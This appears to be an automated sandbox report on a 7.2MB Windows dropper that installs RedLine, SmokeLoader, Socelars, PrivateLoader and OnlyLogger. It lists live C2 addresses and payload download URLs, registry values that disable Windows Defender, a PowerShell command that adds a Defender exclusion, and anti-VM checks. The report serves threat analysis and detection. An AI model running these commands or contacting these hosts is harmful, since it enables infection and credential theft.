onlylogger | 9e2d551a03e90c909e4b8e68652a8dffcb99b4185e41980feffa2a1aa4094ca0

Resubmissions

05-09-2022 12:11

220905-pcnb9agfeq 10

05-09-2022 12:03

220905-n8jhhagefr 10

05-09-2022 11:58

220905-n471asbbd7 10

Analysis

max time kernel
151s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
05-09-2022 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe
Size

7.2MB
MD5

5344122403aa17bdd17da86106c36a05
SHA1

545508ee5a9eaae98e5d1c3907ce127c6b8466d0
SHA256

001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149
SHA512

44bda0da094daed154107effa2c82f9ff160f476d00f546f91c2222d443e5c32ffe374518236a285c7ae0e9d5b880bc71f3b775e875db7e45387ee715148525a
SSDEEP

196608:JswYLEw+44GxXsoFSWkBNB/E/BrbA81t1e1yGcSbI:JsOwjuDWENCJrp1t1sxcv

Score

10^/10

onlylogger privateloader redline smokeloader socelars ani aspackv2 backdoor evasion infostealer loader main spyware stealer themida trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

ANI

45.142.215.47:27643

Extracted

Family

privateloader

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp

Signatures

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3228-273-0x0000000000030000-0x0000000000039000-memory.dmp	family_smokeloader
behavioral2/memory/4244-326-0x00000000004E2000-0x00000000004EB000-memory.dmp	family_smokeloader

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Mon01cf8a055762873.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Mon01cf8a055762873.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Mon01cf8a055762873.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Mon01cf8a055762873.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	Mon01cf8a055762873.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Mon01cf8a055762873.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Mon01cf8a055762873.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Mon01cf8a055762873.exe

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 3836 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	3836	rundll32.exe

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4368-239-0x0000000000300000-0x0000000000B34000-memory.dmp	family_redline
behavioral2/memory/2320-249-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/2320-250-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon01c85f13069b1.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon01c85f13069b1.exe	family_socelars

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

Mon0119c0f0a6c0.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Mon0119c0f0a6c0.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Mon0119c0f0a6c0.exe

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3764-266-0x0000000000650000-0x0000000000698000-memory.dmp	family_onlylogger
behavioral2/memory/3764-267-0x0000000000400000-0x000000000046C000-memory.dmp	family_onlylogger
behavioral2/memory/3764-314-0x0000000000400000-0x000000000046C000-memory.dmp	family_onlylogger

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS80012827\libstdc++-6.dll	aspack_v212_v242

Executes dropped EXE 18 IoCs

Processes:

setup_installer.exesetup_install.exeMon01b98d7fe5098.exeMon0177a62f18808.exeMon01cf8a055762873.exeMon01e2b29c951b8.exeMon01d859be0f6db8059.exeMon01299c7ce4.exeMon019c4a051b44a.exeMon0119c0f0a6c0.exeMon010922e6eed.exeMon01c85f13069b1.exeMon01b55aa1b7d22ae4c.exeMon019fbdbdc47.exeMon019fbdbdc47.tmpMon010922e6eed.exe09xU.exEguubfrw

pid	process
8	setup_installer.exe
2208	setup_install.exe
1304	Mon01b98d7fe5098.exe
3764	Mon0177a62f18808.exe
3376	Mon01cf8a055762873.exe
4604	Mon01e2b29c951b8.exe
3504	Mon01d859be0f6db8059.exe
1080	Mon01299c7ce4.exe
1316	Mon019c4a051b44a.exe
4368	Mon0119c0f0a6c0.exe
2676	Mon010922e6eed.exe
3336	Mon01c85f13069b1.exe
3228	Mon01b55aa1b7d22ae4c.exe
4300	Mon019fbdbdc47.exe
5020	Mon019fbdbdc47.tmp
2320	Mon010922e6eed.exe
4656	09xU.exE
4244	guubfrw

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Mon0119c0f0a6c0.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Mon0119c0f0a6c0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Mon0119c0f0a6c0.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

09xU.exEmshta.exemshta.exeMon01cf8a055762873.exe001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exesetup_installer.exeMon019c4a051b44a.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	09xU.exE
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Mon01cf8a055762873.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	Mon019c4a051b44a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 13 IoCs

Processes:

setup_install.exeMon019fbdbdc47.tmprundll32.exerundll32.exerundll32.exe

pid	process
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
2208	setup_install.exe
5020	Mon019fbdbdc47.tmp
4648	rundll32.exe
1460	rundll32.exe
476	rundll32.exe
476	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon0119c0f0a6c0.exe	themida
C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon0119c0f0a6c0.exe	themida
behavioral2/memory/4368-239-0x0000000000300000-0x0000000000B34000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

Mon0119c0f0a6c0.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Mon0119c0f0a6c0.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
83 ipinfo.io
84 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Mon0119c0f0a6c0.exe

pid process

4368 Mon0119c0f0a6c0.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Mon010922e6eed.exe

description pid process target process

PID 2676 set thread context of 2320 2676 Mon010922e6eed.exe Mon010922e6eed.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Mon0119c0f0a6c0.exe

flow	ioc
13	ip-api.com
83	ipinfo.io
84	ipinfo.io

description	pid	process	target process
PID 2676 set thread context of 2320	2676	Mon010922e6eed.exe	Mon010922e6eed.exe

Program crash 13 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2172	2208	WerFault.exe	setup_install.exe
2944	4648	WerFault.exe	rundll32.exe
2712	3764	WerFault.exe	Mon0177a62f18808.exe
740	3764	WerFault.exe	Mon0177a62f18808.exe
4308	3764	WerFault.exe	Mon0177a62f18808.exe
4776	3764	WerFault.exe	Mon0177a62f18808.exe
4056	3764	WerFault.exe	Mon0177a62f18808.exe
3252	3764	WerFault.exe	Mon0177a62f18808.exe
4600	3764	WerFault.exe	Mon0177a62f18808.exe
3788	3764	WerFault.exe	Mon0177a62f18808.exe
536	3764	WerFault.exe	Mon0177a62f18808.exe
1068	3764	WerFault.exe	Mon0177a62f18808.exe
800	3764	WerFault.exe	Mon0177a62f18808.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Mon01b55aa1b7d22ae4c.exeguubfrw

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon01b55aa1b7d22ae4c.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon01b55aa1b7d22ae4c.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Mon01b55aa1b7d22ae4c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	guubfrw
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	guubfrw
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	guubfrw

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3332 taskkill.exe
4960 taskkill.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
3332	taskkill.exe
4960	taskkill.exe

description	flow	ioc
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Mon0119c0f0a6c0.exepowershell.exeMon01b55aa1b7d22ae4c.exe

pid	process
4368	Mon0119c0f0a6c0.exe
4368	Mon0119c0f0a6c0.exe
748	powershell.exe
748	powershell.exe
748	powershell.exe
3228	Mon01b55aa1b7d22ae4c.exe
3228	Mon01b55aa1b7d22ae4c.exe
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024
3024

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

Mon0177a62f18808.exe

pid process

3024
3764 Mon0177a62f18808.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Mon01b55aa1b7d22ae4c.exeguubfrw

pid process

3228 Mon01b55aa1b7d22ae4c.exe
4244 guubfrw

pid	process
3024
3764	Mon0177a62f18808.exe

pid	process
3228	Mon01b55aa1b7d22ae4c.exe
4244	guubfrw

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

Mon01299c7ce4.exeMon01c85f13069b1.exepowershell.exesihclient.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1080	Mon01299c7ce4.exe
Token: SeCreateTokenPrivilege	3336	Mon01c85f13069b1.exe
Token: SeAssignPrimaryTokenPrivilege	3336	Mon01c85f13069b1.exe
Token: SeLockMemoryPrivilege	3336	Mon01c85f13069b1.exe
Token: SeIncreaseQuotaPrivilege	3336	Mon01c85f13069b1.exe
Token: SeMachineAccountPrivilege	3336	Mon01c85f13069b1.exe
Token: SeTcbPrivilege	3336	Mon01c85f13069b1.exe
Token: SeSecurityPrivilege	3336	Mon01c85f13069b1.exe
Token: SeTakeOwnershipPrivilege	3336	Mon01c85f13069b1.exe
Token: SeLoadDriverPrivilege	3336	Mon01c85f13069b1.exe
Token: SeSystemProfilePrivilege	3336	Mon01c85f13069b1.exe
Token: SeSystemtimePrivilege	3336	Mon01c85f13069b1.exe
Token: SeProfSingleProcessPrivilege	3336	Mon01c85f13069b1.exe
Token: SeIncBasePriorityPrivilege	3336	Mon01c85f13069b1.exe
Token: SeCreatePagefilePrivilege	3336	Mon01c85f13069b1.exe
Token: SeCreatePermanentPrivilege	3336	Mon01c85f13069b1.exe
Token: SeBackupPrivilege	3336	Mon01c85f13069b1.exe
Token: SeRestorePrivilege	3336	Mon01c85f13069b1.exe
Token: SeShutdownPrivilege	3336	Mon01c85f13069b1.exe
Token: SeDebugPrivilege	3336	Mon01c85f13069b1.exe
Token: SeAuditPrivilege	3336	Mon01c85f13069b1.exe
Token: SeSystemEnvironmentPrivilege	3336	Mon01c85f13069b1.exe
Token: SeChangeNotifyPrivilege	3336	Mon01c85f13069b1.exe
Token: SeRemoteShutdownPrivilege	3336	Mon01c85f13069b1.exe
Token: SeUndockPrivilege	3336	Mon01c85f13069b1.exe
Token: SeSyncAgentPrivilege	3336	Mon01c85f13069b1.exe
Token: SeEnableDelegationPrivilege	3336	Mon01c85f13069b1.exe
Token: SeManageVolumePrivilege	3336	Mon01c85f13069b1.exe
Token: SeImpersonatePrivilege	3336	Mon01c85f13069b1.exe
Token: SeCreateGlobalPrivilege	3336	Mon01c85f13069b1.exe
Token: 31	3336	Mon01c85f13069b1.exe
Token: 32	3336	Mon01c85f13069b1.exe
Token: 33	3336	Mon01c85f13069b1.exe
Token: 34	3336	Mon01c85f13069b1.exe
Token: 35	3336	Mon01c85f13069b1.exe
Token: SeDebugPrivilege	748	powershell.exe
Token: SeDebugPrivilege	3332	sihclient.exe
Token: SeDebugPrivilege	4960	taskkill.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2576 wrote to memory of 8	2576	001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe	setup_installer.exe
PID 2576 wrote to memory of 8	2576	001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe	setup_installer.exe
PID 2576 wrote to memory of 8	2576	001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe	setup_installer.exe
PID 8 wrote to memory of 2208	8	setup_installer.exe	setup_install.exe
PID 8 wrote to memory of 2208	8	setup_installer.exe	setup_install.exe
PID 8 wrote to memory of 2208	8	setup_installer.exe	setup_install.exe
PID 2208 wrote to memory of 3732	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3732	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3732	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3360	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3360	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 3360	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1192	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1192	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1192	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2248	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2248	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2248	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1172	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1172	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1172	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4984	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4984	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4984	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2244	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2244	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2244	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4868	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4868	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4868	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4432	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4432	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4432	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4156	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4156	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4156	2208	setup_install.exe	cmd.exe
PID 2248 wrote to memory of 1304	2248	cmd.exe	Mon01b98d7fe5098.exe
PID 2248 wrote to memory of 1304	2248	cmd.exe	Mon01b98d7fe5098.exe
PID 2208 wrote to memory of 1472	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1472	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 1472	2208	setup_install.exe	cmd.exe
PID 1192 wrote to memory of 3764	1192	cmd.exe	Mon0177a62f18808.exe
PID 1192 wrote to memory of 3764	1192	cmd.exe	Mon0177a62f18808.exe
PID 1192 wrote to memory of 3764	1192	cmd.exe	Mon0177a62f18808.exe
PID 1172 wrote to memory of 3376	1172	cmd.exe	Mon01cf8a055762873.exe
PID 1172 wrote to memory of 3376	1172	cmd.exe	Mon01cf8a055762873.exe
PID 1172 wrote to memory of 3376	1172	cmd.exe	Mon01cf8a055762873.exe
PID 3360 wrote to memory of 4604	3360	cmd.exe	Mon01e2b29c951b8.exe
PID 3360 wrote to memory of 4604	3360	cmd.exe	Mon01e2b29c951b8.exe
PID 3360 wrote to memory of 4604	3360	cmd.exe	Mon01e2b29c951b8.exe
PID 3732 wrote to memory of 748	3732	cmd.exe	powershell.exe
PID 3732 wrote to memory of 748	3732	cmd.exe	powershell.exe
PID 3732 wrote to memory of 748	3732	cmd.exe	powershell.exe
PID 2208 wrote to memory of 2632	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2632	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 2632	2208	setup_install.exe	cmd.exe
PID 4984 wrote to memory of 3504	4984	cmd.exe	Mon01d859be0f6db8059.exe
PID 4984 wrote to memory of 3504	4984	cmd.exe	Mon01d859be0f6db8059.exe
PID 4984 wrote to memory of 3504	4984	cmd.exe	Mon01d859be0f6db8059.exe
PID 2208 wrote to memory of 4108	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4108	2208	setup_install.exe	cmd.exe
PID 2208 wrote to memory of 4108	2208	setup_install.exe	cmd.exe
PID 2244 wrote to memory of 1080	2244	cmd.exe	Mon01299c7ce4.exe
PID 2244 wrote to memory of 1080	2244	cmd.exe	Mon01299c7ce4.exe

C:\Users\Admin\AppData\Local\Temp\001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe
"C:\Users\Admin\AppData\Local\Temp\001997f3e75c1e0e3857f79186bfc2af22a043a2e3bd9b640a22b9f59dbc9149.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2576

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:8

C:\Users\Admin\AppData\Local\Temp\7zS80012827\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS80012827\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon01e2b29c951b8.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3360

C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon01e2b29c951b8.exe
Mon01e2b29c951b8.exe
5⤵
- Executes dropped EXE
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon0177a62f18808.exe /mixone
4⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Users\Admin\AppData\Local\Temp\7zS80012827\Mon0177a62f18808.exe
Mon0177a62f18808.exe /mixone
5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 620
6⤵
- Program crash
PID:2712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 620
6⤵
- Program crash
PID:740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 640
6⤵
- Program crash
PID:4308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 776
6⤵
- Program crash
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 756
6⤵
- Program crash
PID:4056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 860
6⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048
6⤵
- Program crash
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1056
6⤵
- Program crash
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1340
6⤵
- Program crash
PID:536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1312
6⤵
- Program crash
PID:1068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1216
6⤵
- Program crash
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon01cf8a055762873.exe
4⤵
